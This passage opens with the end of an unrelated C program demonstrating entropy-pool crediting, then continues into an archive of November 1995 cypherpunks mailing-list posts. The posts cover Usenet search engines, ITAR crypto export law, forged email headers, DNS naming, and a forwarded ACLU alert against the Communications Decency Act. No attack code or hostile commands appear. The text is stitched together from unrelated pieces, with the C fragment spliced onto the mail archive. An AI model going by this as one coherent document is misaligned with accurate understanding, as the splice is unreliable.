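                       ? 0 : pool->entropy_bits - (unsigned)bits;
    return want;
}

/* Constructed sample timestamps (arbitrary tick units), not measured data. */
static const uint32_t TIMER_TICKS[] = {1000, 2000, 3000, 4000, 5000, 6000};
static const uint32_t DISK_LIKE[]   = {100, 1337, 1500, 4096, 4200, 9001};

int main(void)
{
    struct entropy_pool pool = {0};
    printf("timer trace credited %u bits\n", feed_trace(&pool, TIMER_TICKS, 6));
    printf("disk-like trace credited %u bits\n", feed_trace(&pool, DISK_LIKE, 6));
    printf("random-style read of 16 bytes granted %zu\n", read_random_style(&pool, 16));
    printf("urandom-style read of 16 bytes granted %zu\n", read_urandom_style(&pool, 16));
    printf("estimate left: %u bits\n", pool.entropy_bits);
    return 0;
}
```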






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Tue, 7 Nov 1995 14:19:28 +0800
To: Damaged Justice <frogfarm@yakko.cs.wmich.edu>
Subject: Re: DejaNews all over again
In-Reply-To: <199511062222.RAA14762@yakko.cs.wmich.edu>
Message-ID: <Pine.ULT.3.91.951106203817.19364A-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 6 Nov 1995, Damaged Justice wrote:

> My two cents: I've used Dejanews for almost a month now, and have been
> consistently impressed with the results. The uses are many; the danger,
> as others have noted, is that people forget (or never realize in the
> first place) that you should never post anything to Usenet that you
> wouldn't want to see plastered on the evening news.
> 
> Having said that, I'm greatly looking forward to the impending addition
> of the alt.* groups to their archives. Everyone is indeed a Kibo now,
> and the general public has become more aware of the need for reputations
> as a result.

I absitively agree. I have no quarrel with archiving and redistributing 
public information. I think it's great.

Might also help spread awareness of the anonymity options available. It 
would be good to see if the dejanews folks would give the anon servers a 
plug. Anybody friendly with them?

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Stephen Whitaker <whitaker@sover.net>
Date: Tue, 7 Nov 1995 11:02:27 +0800
To: cypherpunks@toad.com
Subject: toolkits?
Message-ID: <199511070141.UAA15583@maple.sover.net>
MIME-Version: 1.0
Content-Type: text/plain


OK folks, nobody seems to have any ideas how to keep our little state of
Vermont from falling prey to mediocrity in the internet. I thought with so
many highly opinionated people I would at least get a few good or at least
entertaining suggestions.

How about a different angle. Can anyone aid in building capacity among a few
sincere watchdog types to really learn how to map, trace and test the net
here as it grows?
What constitutes a basic toolkit for trace route, sniff for promiscuous
mode, all the other tools to map what's happening to net traffic in a little
state of 1/2 million people? What are the sources of traffic information?
With there not even a single DS-3 in the state yet carrying IP it seems we
just might have a prayer of doing it right, whatever that is. What would it
look like if secure communications and anonymity were designed in from the
start? Is this what Sameer is doing in Bezerkeley?

What machines are considered minimum requirements to use these tools? What
are the essential reference works?
-sw





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Tue, 7 Nov 1995 15:05:22 +0800
To: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
Subject: Re: Exporting software doesn't mean exporting (was: Re: lp ?)
In-Reply-To: <m0tCcXa-0004JWC@pdj2-ra.F-REMOTE.CWRU.Edu>
Message-ID: <Pine.SOL.3.91.951106202632.8543C-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 6 Nov 1995, Peter D. Junger wrote:

> 
> Don't blame this on my being a lawyer; blame it on some very sick
> people in the Office of Defense Trade Controls and in the NSA.

I think it's unfair to call the people at the ODTC and the NSA sick; 
during the cold war, such restrictions did make some sense; in 
particular, controlling the export of high-performance encryption 
hardware does make it harder for other countries to deploy ubiquitous 
strong encryption, particularly in the less developed countries, and 
particularly for chips that required exotic fabrication (the soviet union 
never had really good mass-production facilities). 

Controlling software encryption without controlling publication never
seemed to make that much sense, except that the lack of ubiquitous
encryption probably allowed for lots of relatively non-sensitive 
intercepts that might otherwise have been impossible, and which may have 
been useful fuel for analysts. 

 However, now that the cold war is over, and now that fab plants are
sprouting up all over the world, these restrictions make a lot less sense
than they used to. Their main consequence is to restrict the deployment of
strong cryptography world wide, including the United States. Strangely
enough this would seem to hurt, not help, the NSA in the most important
part of their current mission, which is to help protect US industry
against industrial espionage and virtual terrorism, which is a far more
pressing threat. 

It's time for the policy makers at the NSA and GCHQ to realise that they
won the war, give the appropriate people OBEs and knighthoods, allow the
GCHQ to rejoin the civil service unions and apologise for the insult to
their patriotism of their forcible de-unionisation, and above all,
concentrate on fighting the real enemy - The French :-)

Simon // Wow! Did I really just write all that. Next thing you know, I'll 
      // be saying something nice about Netscape.

p.s.
 
   I would expect the incoming Labour government to remove the ban on
Union membership at GCHQ, with the old guaranteed non-strike agreement. I
wonder how many other similar organisations allow employees to belong to
unions? I'd guess that the Israeli ones would, mainly because I can't
imagine any major Israeli organisation not being unionised :-); I can't
picture the CIA or NSA allowing collective bargaining ("America works 
best when you say Union 0w98bvchgfwer097").





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 7 Nov 1995 13:27:17 +0800
To: cypherpunks@toad.com
Subject: Re: toolkits?
Message-ID: <acc415d311021004dd09@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


The most common typo (of any significance) I seem to make is leaving out
the "not" in a strongly worded statement:

>You may have gotten no responses because it generally is not up to a state
>government to ensure that "mediocrity" in the Internet is avoided (though
>I'm not sure what is meant by "mediocrity." If it is security and
>anonymity, this is definitely the state government's responsibility, or
                               ^
                               not
>even area of interest.)

It's almost as if I'm "leaning on the horn" so much as I'm typing, that I
leave out the all-important "not" modifier.

My apologies.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: carolann@censored.org (Censored Girls Anonymous)
Date: Tue, 7 Nov 1995 22:32:16 +0800
To: cypherpunks@toad.com
Subject: Request for URL'S
Message-ID: <199511062033.UAA17159@mailhost1.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


I have trebled my WWW site size.
It is now a comfortable 15 megs big.

I'd love to make a Cypherpunk URL page,
so if you will send your five favorite URL's
I'll put them all on a page like The Dreams Page,
(http:www.primenet.com/~carolab/dreams.html)
and turn it loose on the net.

Nov. 15th is when I will edit up the page.

Love Always,

Carol Anne
--

Member Internet Society  - Certified BETSI Programmer  -  Webmistress
***********************************************************************
Carol Anne Braddock (cab8)  carolann@censored.org   206.42.112.96
My Homepage
The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 7 Nov 1995 22:36:20 +0800
To: cypherpunks@toad.com
Subject: Re: [NOISE] DejaNews all over again--a URL for Usenet Searching
Message-ID: <acc41c71130210046b0e@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:49 PM 11/6/95, Peter Trei wrote:
>> I usually avoid passing on URLs of interesting sites, in the name of
>> conserving bandwidth (*), but this one really has me jazzed:
>> http://dejanews.com/
>> It allows searching of Usenet archives (a few months' worth, from what I
>> can see).
>
>Unfortunately, it does not archive alt, soc, talk,  or *.binaries (the
>latter is
>probably a blessing). Specialized news grepping is still useful - see
>http://www.iii.net/users/trei/usenet.html for an example.

excite Netsearch (http://www.excite.com/) indexes all or part of alt, soc,
and talk groups. (I say "all or part" because I obviously cannot verify
that it indexes all posts to these groups just by verifying that it indexes
at least _some_ posts in these groups.)

It even indexes the *.binaries.* groups, as I just learned.

(Paul Robichaux told me about the http://www.excite.com/ URL.)

--Tim May


Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shields@tembel.org (Michael Shields)
Date: Tue, 7 Nov 1995 12:22:57 +0800
To: cypherpunks@toad.com
Subject: Re: censored? corrected [Steve Pizzo cited in The Spotlight]
In-Reply-To: <9511061509.AA10512@mhv.net>
Message-ID: <47m051$236@yage.tembel.org>
MIME-Version: 1.0
Content-Type: text/plain


In article <9511061509.AA10512@mhv.net>,
Lynne L. Harrison <lharrison@mhv.net> wrote:
>   If, however, the growth continues with people, not only accessing the net,
> but getting domain names - doesn't it seem likely that, at some point, only
> IP addresses will be left (or dumb domain names like http://www.stkdlcp.com)?
>   Ergo, what is the problem with having a numerical URL?

Stability.  Originally DNS was just a handy user-friendly thing, but then
it became the primary way to name a host.  This allowed the IP address
to become irrelevant, which allows entire sites to be renumbered when the
network topology changes.  This is important to keep the routing tables
small (by minimizing the backwards-compatibility exceptions), which is
a critical problem today.  Thus all recent architectural decisions have
been away from direct use of IP addresses anywhere.

DNS zone table size is also a problem; solutions will probably be in the
form of new top-level domains.  You might see http://fubarco.www or
http://www.ibm or http://www.fubarco.inc, but not http://10.5.23.10.

Neither routing table scaling nor DNS zone scaling is really on-topic;
if you're interested I'll give you some pointers in private mail.
-- 
Shields.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 7 Nov 1995 11:48:25 +0800
To: tien@well.sf.ca.us (Lee Tien)
Subject: Re: forging headers
In-Reply-To: <199511070249.SAA14921@well.com>
Message-ID: <199511070255.VAA14851@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



You didn't send ALL the headers, only some of them. You need to send
on the full set to make a trace possible.

Lee Tien writes:
> So I got this message.  How would someone identify the sender of this
> message?  I'm writing an article on anonymity, with some discussion of
> remailers, and want to argue that forging already permits people to raise
> the costs of tracing significantly, anonymous remailers or no.  
> 
> Lee
> 
> >From: freeh@fbi.gov
> >Date: Tue, 24 Oct 95 16:07:08 -0400
> >Apparently-To: tien@well.sf.ca.us
> >X-UIDL: 814570964.056
> >
> >> How difficult is it to forge headers?  How difficult is it to trace a
> >> message to the actual sender if the header is forged?
> >
> >Not very difficult at all (to forge, that is).  This is a quick and dirty
> >example that should be somewhat traceable.  If you want pointers on how to
> >trace it, post the whole thing, including headers, to cypherpunks.
> >
> >Louis




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
Date: Tue, 7 Nov 1995 13:37:01 +0800
To: cypherpunks@toad.com>
Subject: Re: Exporting software doesn't mean exporting (was: Re: lp ?)
In-Reply-To: <199511070208.VAA14762@jekyll.piermont.com>
Message-ID: <m0tCewB-0004JWC@pdj2-ra.F-REMOTE.CWRU.Edu>
MIME-Version: 1.0
Content-Type: text/plain


"Perry E. Metzger" writes:

: I am starting to have trouble believing you are a lawyer. Are you
: actually telling me that treaties which explicitly indemnify
: transshipment customers against local laws are superseded by lower
: level laws, in spite of the supremacy clause of the constitution? That
: might be what the state department would tell you, but I'd have
: trouble believing even a lobotomized mongoloid judge would let that
: stand. Treaties are treaties, period.

What I am telling you, if you would pay attention, is that there is no
transhipment involved.  The violation of the ITAR consists of
disclosing information, not shipment.

And that is pretty clearly unconstitutional because it violates the
first amendment, but it has nothing whatsoever to do with any
treaties--certainly nothing to do with treaties about transhipment.

If a Frenchman on vacation in the Riviera shows a copy of PGP sourcecode
to a German businessman there, that is literally a violation of the
ITAR.  If the disclosure is made by sending a copy of the software from
one hotel room to another, and if that message happens to get routed
through the United States, that is still a violation.  The fact that the
message went through the United States is irrelevant.

Don't expect the ITAR to make any sense.  And don't think that you can
apply logic to the ITAR and get logical results.  It doesn't work that
way.

--
Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
Internet:  junger@pdj2-ra.f-remote.cwru.edu    junger@samsara.law.cwru.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Lynne L. Harrison" <lharrison@mhv.net>
Date: Tue, 7 Nov 1995 13:05:34 +0800
To: cypherpunks@toad.com
Subject: FWD:Religious Right Threatens to Shut Down Net: Call NOW
Message-ID: <9511070330.AA15297@mhv.net>
MIME-Version: 1.0
Content-Type: text/plain


>Return-Path: <ACLUNATL@aol.com>
>Date: Mon, 6 Nov 1995 13:43:13 -0500
>From: ACLUNATL@aol.com
>To: beeson@aclu.org
>Subject: Religious Right Threatens to Shut Down Net: Call NOW
>Content-Length: 27519
>
>Here are the advocacy instructions for individuals opposed to the Federal
>Online Indecency Legislation that we promised last week.
>
>========================================================================
>       CAMPAIGN TO STOP THE EXON/COATS COMMUNICATIONS DECENCY ACT
>	(SEE THE LIST OF CAMPAIGN COALITION MEMBERS AT THE END)
>
>	Update: -Latest News:
>		 The Christian Coalition is pushing Congress to censor
>		 the net more heavily than even Sen. J.J. Exon ever imagined.
>	 	 There is the very real possibility that they may succeed.
>
>		 You should be very worried.  We are.
>
>		-What You Can Do Now:
>	 	 Follow the directions below and call House Speaker
>		 Gingrich and Senate Leader Dole.  Implore them
>		 to allow parents to make choices for their children, instead
>		 of government censors.
>
>		 Volunteer to join the fight by helping organize in your
>		 home town.  
>
>        CAMPAIGN TO STOP THE UNCONSTITUTIONAL COMMUNICATIONS DECENCY ACT
>			   Nov 2, 1995
>
>      PLEASE WIDELY REDISTRIBUTE THIS DOCUMENT WITH THIS BANNER INTACT
>		REDISTRIBUTE ONLY UNTIL December 1, 1995
>	       REPRODUCE THIS ALERT ONLY IN RELEVANT FORUMS
>
>________________________________________________________________________
>CONTENTS
>	The Latest News
>	What You Can Do Now
>	The letter from Ed Meese and the Christian Right
>	Chronology of the CDA
>        For More Information
>        List Of Participating Organizations
>
>________________________________________________________________________
>THE LATEST NEWS
>
>Since the very first day that Senator J.J. Exon (D-NE) proposed censorship
>legislation for the Internet, the Christian Right has pushed for the most
>restrictive regulations they could think of.
>
>The Religious Right (which does not necessarily speak for all religious
>people concerned with this issue) recently tipped their hand in a letter
>to Sen. Larry Pressler (R-SD) and Rep. Thomas Bliley (R-VA) requesting
>a new and more restrictive net censorship proposal.
>
>There are essentially three new dangerous elements of their campaign
>to shut down cyberspace:
>
>
>INTERNET PROVIDERS, ONLINE SERVICES, AND LIBRARIES CRIMINALLY LIABLE FOR
> EXPRESSION ONLINE
>The Religious Right has proposed to hold anyone who provides access to the
>Internet or other interactive media, including online services providers,
>ISP's, BBS's, Libraries, and Schools, criminally liable for all speech
>carried on the network.
>
>In order to avoid liability under this provision, service providers would be
>forced to monitor users' electronic communications to be assured that
>no "indecent" material is transmitted across their networks.
>
>This proposal is MORE RESTRICTIVE than the Exon Communications Decency Act,
>or any other net censorship legislation currently in Congress.
>
>In their letter to Congress, the Religious Right says:
>
>	[Providers] would simply be required to avoid KNOWING violations of
>	the law. [emphasis added]
>
>However, the "knowing" standard is vague enough that the mere knowledge
>that such material exists could be sufficient to trigger criminal liability.
>A single complaint or even a news report could force a service provider to
>take down a web page, remove posts to chat rooms or other discussion
>forums, or shut down listservs in order to avoid going to jail and facing
>huge fines.
>
>
>A STANDARD FOR INDECENCY
>The proposals pushed by the Christian Coalition rely on the
>unconstitutional "indecency standard".  Like the Exon Communications
>Decency Act, the Christian Coalition seeks to regulate all indecent
>speech online.
>
>Indecency is a broad category that includes everything from George Carlin's
>"seven dirty words" to such classic novels as "The Catcher in the Rye" and
>"Lady Chatterley's Lover". 
>
>The Supreme Court has ruled that restrictions on indecent speech are 
>Constitutional only if they rely on the "least restrictive means".  Broad
>indecency restrictions on interactive media do not satisfy the "least
>restrictive means" test, because interactive media allows users and
>parents tremendous control over the information they receive.
>
>Any legislation which attempts to apply an indecency restriction to the 
>Internet is unconstitutional on its face.
>
>The Christian Coalition's proposal that relies on an indecency
>restriction contemplates dumbing down every conversation, web page,
>newsgroup, and mailing list on the Internet to the level of what is
>not offensive to children.
>
>What kind of discussions between adults are possible in an arena
>where everything has been reduced to the level of the Lion King?
>
>
>UNPRECEDENTED CONTROL OVER ONLINE SPEECH FOR THE FCC
>The Christian Coalition would give the FCC broad jurisdiction over
>cyberspace.  It would allow the FCC jurisdiction over your online
>speech, and over the design of Internet software, such as web browsers and
>filtering programs that parents can use to control their children's
>access to the Internet.
>
>The Internet has developed from a government project to a market-driven
>economic boom for thousands of businesses.  Giving the FCC authority over
>this medium would significantly hinder the growth of this new industry.
>
>________________________________________________________________________
>WHAT YOU CAN DO NOW
>
>1. The proposals from the Religious Right will literally destroy online
>   speech as we know it.  The odds of stopping this are not certain.
>
>   There is a very real chance that this legislation will pass, and
>   we will experience a period of uncertainty and chilling of speech
>   while an appropriate test case attempts to reach the Supreme Court
>   (should it even get there!)
>
>   The Religious Right has a strong grass-roots network.  We need to
>   counter their energy and ensure cyberspace is not lost due to them.
>
>   IMMEDIATELY CALL House Speaker Gingrich (R-GA) and Senate Leader
>   Dole (R-KS) and urge them to oppose the Christian Coalition's
>   proposal.
>
>   Name, Address, and Party     Phone            Fax
>   ========================     ==============   ==============
>   R GA Gingrich, Newt          1-202-225-4501   1-202-225-4656
>   R KS Dole, Robert            1-202-224-6521   1-202-224-8952
>
>   If you're at a loss for words, try one of the following:
>
>	Please oppose the recent proposal from the Religious Right to
>	censor the Internet.  The only effective way to address children's
>	access to the Internet is through parental control tools outlined
>	by the Cox/White/Wyden approach.
>   or
>	As a religious person and a parent, I oppose the Religious Right's
>	attempts to censor the Internet.  I am the best person to monitor
> 	my child's access to the Internet using parental control tools
>	as outlined in the Cox/White/Wyden approach.
>  
>2. Join the online fight by becoming a volunteer for your district!
>
>   Check to see if your legislator is in the list below.  If they are
>   not, consult the free ZIPPER service that matches Zip Codes to
>   Congressional districts with about 85% accuracy at:
>
>	URL:http://www.stardot.com/~lukeseem/zip.html
>
>   The conference committee legislators are:
>   House: Barr (R-GA), Barton (R-TX), Berman (R-CA), Bliley (R-VA),
>	Boucher (D-VA), Brown (D-OH), Bryant (D-TX), Buyer (R-IN),
>	Conyers (D-MI), Dingell (D-MI), Eshoo (D-CA), Fields (R-TX),
>	Flanagan (R-IL), Frisa (R-NY), Gallegly (R-CA), Goodlatte (R-VA),
>	Gordon (D-TN), Hastert (R-IL), Hoke (R-OH), Hyde (R-IL),
>	Jackson-Lee (D-TX), Klug (R-WI), Lincoln (D-AR), Markey (D-MA),
>	Moorhead (R-CA), Oxley (R-OH), Paxon (R-NY), Rush (D-IL),
>	Schaefer (R-CO), Schroeder (D-CO), Scott (D-VA), Stearns (R-FL),
>	White (R-WA)
>   Senate: Burns (R-MT), Exon (D-NE), Ford (D-KY), Gorton (R-WA),
>	Hollings (D-SC), Inouye (D-HI), Lott (R-MS), McCain (R-AZ),
>	Pressler (R-SD), Rockefeller (D-WV), Stevens (R-AK)
>
>   If your legislator is on the conference committee, you have a chance
>   to influence their vote on this issue with your power as a constituent.
>   Volunteer to help educate your legislator by sending mail to
>   volunteer@vtw.org.  A coalition volunteer will be in touch with you.
>
>   You can start working to help spread the word in your district by
>   sending this letter to five friends.  Ask them to call Dole and Gingrich
>   as well.
>
>3. The People for the American Way (PFAW) and the American Civil Liberties
>   Union are organizing a letter from ORGANIZATIONS to the Conference
>   Committee to oppose the censorship provisions.
>
>   If you are a representative of an organization that would like to
>   sign on to this letter, you should contact jlesser@pfaw.org IMMEDIATELY.
>
>4. We can't suggest relaxing at this point.  The stakes are too high, and
>   the risk is too great.  Everything now hangs in the balance.
>
>________________________________________________________________________
>THE LETTER FROM ED MEESE AND THE CHRISTIAN RIGHT
>
>October 16, 1995
> 
>The Honorable Thomas J. Bliley, Jr.  Chairman
>Committee on Commerce
>United States House of Representatives
>Washington, DC 20515
> 
>The Honorable Larry Pressler, Chairman
>Committee on Commerce, Science, and Transportation
>United States Senate
>Washington, DC 20510
> 
>Re: Computer Pornography Provisions in Telecommunications Bill
> 
>Dear Mr. Chairmen:
> 
>We are writing to urge the conference committee seeking to reconcile the
>telecommunications bills passed by the House and Senate include in the
>final bill the strongest possible criminal law provisions to address the
>growing and immediate problem of computer pornography without any
>exemptions, defenses, or political favors of any kind accorded to those
>who knowingly participate in the distribution of obscenity to anyone or
>indecency to children. While there is no perfect solution to the problem
>of computer pornography, Congress could not hope to solve this problem by
>holding liable only some who are responsible for the problem.
> 
>The recent Justice Department prosecution project targeting those who
>violated federal child pornography law using America On-Line is
>instructive in this regard. More than ninety individuals were targeted for
>prosecution although many others, perhaps as many as 3,000 according to
>one press report, were originally targeted by the Department of Justice as
>potential violators of child pornography laws. Apparently due to a
>shortage of investigative and prosecutorial resources, the project was
>limited. Since there are insufficient resources to investigate and
>prosecute but a fraction of those that are trafficking in child
>pornography by computer, then there will likely be even fewer resources
>available to investigate and prosecute those involved in obscenity and
>indecency.
> 
>Thousands of individuals both in this country and abroad are regularly
>placing obscenity and indecency on the Internet. It is not possible to
>make anything more than a dent in the serious problem of computer
>pornography if Congress is willing to hold liable only those who place
>such material on the Internet while at the same time giving legal
>exemptions or defenses to service or access providers who profit from and
>are instrumental to the distribution of such material. The Justice
>Department normally targets the major offenders of laws. In obscenity
>cases prosecuted to date, it has targeted large companies which have been
>responsible for the nationwide distribution of obscenity and who have made
>large profits by violating federal laws. Prosecution of such companies has
>made a substantial impact in curbing the distribution of obscenity, with
>many such offenders going out of business altogether. So too will
>prosecution of access providers which _knowingly_ traffic in obscenity
>have a substantial impact, a far greater impact than just the prosecution
>of a person who places one or a few prohibited images on the Internet.
>Such a person could not traffic in pornography without the aid or
>facilitation of the service or access providers. Indeed, if Congress
>includes provisions protecting access or service providers in whatever
>bill is finally passed, it is likely that most in this country who are
>trafficking in indecency to children or obscenity would continue to do so
>since the threat of prosecution would be minuscule, given the numbers of
>those currently involved in this activity. It is also likely that those
>outside our country who are engaged in these activities would continue to
>do so since it would be nearly impossible to extradite them to the United
>States for prosecution. Thus, unless all who knowingly participate in such
>matters are subject to the law, the Internet will remain the same and
>Congress will have failed in its responsibilities to the children and
>families of America.
> 
>Federal law has traditionally assigned equal liability both for those who
>commit a crime and those who aid and abet a crime. See Title 18 U.S.C.
>Code Section 2: "(a) whoever [sic] commits an offense against the United
>States or aids, abets, councils [sic], commands, induces, or procures its
>commission, is punishable as a principle [sic]." Service or access
>providers who knowingly participate in the distribution of indecency to
>children or in obscenity to anyone are aiders and abettors in the
>commission of those crimes and thus should have liability under any law
>Congress passes. Current federal law on child pornography provides no
>exemption or defense for access providers. Thus, the child pornography law
>provides a strong deterrent against trafficking in child pornography for
>those who would otherwise knowingly participate in its distribution by
>computer whether pedophile or access provider.
> 
>The changes in law which we support would not hold an access provider
>criminally liable for all illegal pornography on the Internet which their
>services may be used to obtain. Nor would it require that access providers
>check all communications to ensure that no violations of the law are
>occurring. They would simply be required to avoid knowing violations of
>the law. This is an obligation imposed on all citizens. Technology exists
>today for access providers, through a simple process, to target or flag
>and remove files containing objectionable material.
> 
>We support the House-passed language insofar as it addresses obscenity by
>amendment Title 18, Sections 1462, 1465, and 1467 of the United States
>Code. The provision restricting transmission of indecency in the House-passed
>bill, an amendment to Section 1465, is inadequate, and we urge that it be
>substantially revised.
> 
>Attached is the specific language we support which includes the House
>passed language on obscenity and includes revisions on both the House
>passed language on indecency, which would amend Title 18 and the
>Senate-passed language on indecency, which would amend Title 47. The
>combination of these provisions, we believe, would provide effective laws
>to curb obscenity and indecency on the Internet by establishing that all
>who knowingly participate in the distribution or facilitation of obscenity
>to anyone or indecency to children would be subject to the law.
> 
>Thank you for your concern and attention to this matter.
> 
> 
>[signed]
> 
>Edwin Meese III
> 
>Ralph Reed
>Christian Coalition
> 
>Donald E. Wildmon
>American Family Association
> 
>Alan Sears, Former Executive Director
>Atty General's Commission on Pornography
> 
>Phyllis Schlafly
>Eagle Forum
> 
>Beverly LaHaye
>Concerned Women for America
> 
>Reverend Louis P. Sheldon
>Traditional Values Coalition
> 
>Jay Sekulow
>American Center for Law and Justice
> 
>Paul Weyrich
>Free Congress Foundation
> 
>Paul McGeady
>Morality in Media
> 
>Len Munsil
>National Family Legal Foundation
> 
>Robert Peters
>Morality in Media
> 
>Kenneth Sukhia
>Former United States Attorney, N.D., FL
>Former Chairman, Atty General's Advisory Committee
>Subcommittee on Child Exploitation and Obscenity
>
>
>--------------------------
>
> 
>Section 1465 of Title 18, United States Code, is amended to punish
>distribution by computer of indecent material to minors by adding at the
>end the following:
> 
>Whoever knowingly communicates, transmits, or makes available for
>communication or transmission, in or effecting interstate or foreign
>commerce an indecent communication by computer to any person the
>communicator or transmitter believes has not attained the age of 18 years
>of age, knowing that such communication will be obtained by a person
>believed to be under 18 years of age, shall be fined under this title or
>imprisoned not more than five years, or both.
> 
>TITLE IV -- OBSCENE, HARASSING, AND WRONGFUL UTILIZATION OF
>TELECOMMUNICATIONS FACILITY
> 
>SEC. 401. SHORT TITLE
>         This title may be cited as the "Communications Decency Act of
>1995".
> 
>Sec. 402. OBSCENE OR HARASSING USE OF TELECOMMUNICATIONS FACILITIES UNDER
>THE COMMUNICATIONS ACT OF 1934
> 
>Section 223 (47 U.S.C. 223) is amended --
>   (1) by striking subsection (a) and inserting in lieu of [sic]:
> ``(a) Whoever--
>    ``(1) in the District of Columbia or in interstate or foreign
>communications --
>        ``(A) by means of telecommunications device knowingly--
>          ``(i) makes, creates, or solicits, and
>          ``(ii) initiates the transmission of,
>     any comment, request, suggestion, proposal, image, or other
>     communication which is obscene, lewd, lascivious, filthy, or
>     indecent, with intent to annoy, abuse, threaten, or harass
>     another person;
>         ``(B) makes a telephone call or utilizes a
>     telecommunications device, whether or not conversation or
>     communication ensues, without disclosing his identity and
>     with intent to annoy, abuse, threaten, or harass any person
>     at the called number or who receives the communication;
>         ``(C) makes or causes the telephone of another repeatedly
>     or continuously to ring, with intent to harass any person at
>     the called number; or
>         ``(D) makes repeated telephone calls or repeatedly
>     initiates communication with a telecommunications device,
>     during which conversation or communication ensues, solely to
>     harass any person at the called number or who receives the
>     communication;
>      ``(2) knowingly permits any telecommunications facility
>     under his control to be used for any activity prohibited by
>     paragraph (1) with the intent that it be used for
>     such activity,
> 
>  shall be fined not more than $100,000 or imprisoned not more
>  than two years, or both.''; and
> 
>   (2) by adding at the end the following new subsections:
> 
> ``(d) Whoever--
>       ``(1) knowingly within the United States or in foreign
>     communications with the United States by means of
>     telecommunications device makes or makes available any
>     indecent communication in any form including any comment,
>     request, suggestion, proposal, or image, to any person under
>     18 years of age regardless of whether the
>     maker of such communication placed the call or initiated the
>     communication; or
>       ``(2) knowingly permits any telecommunications facility
>     under such person's control to be used for an activity
>     prohibited by paragraph (1) with the intent that it be
>     used for such activity,
>  shall be fined not more than $100,000 or imprisoned not more
>  than two years or both.
>      ``(e) Defenses to subsections (a) and (d), restrictions on 
>     access, judicial remedies respecting restrictions for
>     persons providing information services and
>     access to information services--
>      "(1) It is a defense to prosecution that a person has complied
>     with regulations designed to restrict access to indecent
>     communications to those 18 years old or older as enacted by the
>     Federal Communications Commission which shall prepare final 
>     regulations within 120 days of the passage of this bill. Until
>     such regulations become effective, it is a defense to
>     prosecution that the person has blocked or restricted access
>     to indecent communications to any person under 18 years
>     of age through the use of verified credit card, adult access
>     code, or adult personal identification number (PIN).   
>     Nothing in this subsection shall be construed to treat
>     enhanced information services as common carriage."
>       "(2) No cause of action may be brought in any
>     court or any administrative agency against any person on account
>     of any activity which is not in violation of any law punishable
>     by criminal or civil penalty, which activity the person has taken in
>     good faith to implement a defense authorized under this section or
>     otherwise to restrict or prevent the transmission of, or access to,
>     a communication specified in this section.
>     (f) Nothing in this subsection shall preclude any State or
>     local government from enacting and enforcing laws and regulations
>     which do not result in the imposition of inconsistent obligations on
>     the provision of interstate services.  Nothing in this subsection
>     shall preclude any State or local government from governing conduct
>     not covered by subsection (d)(2)."
>     (g) Nothing in subsection (a), (d), or (e) or in the
>     defenses to prosecution under (e) shall be construed
>     to affect or limit the application or enforcement of any other
>     Federal law.
>     (h) The use of the term 'telecommunications device' in this
>     section shall not impose new obligations on (one-way) broadcast
>     radio or (one-way) broadcast television operators licensed by the
>     Commission or (one-way) cable services registered with the
>     Federal Communications Commission and covered by obscenity and
>     indecency provisions elsewhere in this Act.
> 
>Sec. 403. OBSCENE PROGRAMMING ON CABLE TELEVISION.
> 
>        Section 639 (47 U.S.C. 559) is amended by striking "10,000" and
>inserting "$100,000"
> 
>Sec. 404. BROADCASTING OBSCENE LANGUAGE ON THE RADIO.
> 
>        Section 1466 of Title 18, United States Code, is amended by
>striking out "$10,000" and inserting "$100,000".
> 
>Sec. 405 SEPARABILITY
> 
>        "(a) If any provision of this Title, including amendments to this
>Title of [sic] the application thereof to any person or circumstance is
>held invalid, the remainder of this Title and the application of such
>provision to other persons or circumstances shall not be affected
>thereby."
>
>________________________________________________________________________
>CHRONOLOGY OF THE COMMUNICATIONS DECENCY ACT
>
>Sep 26, '95	Sen. Russ Feingold urges committee members to drop
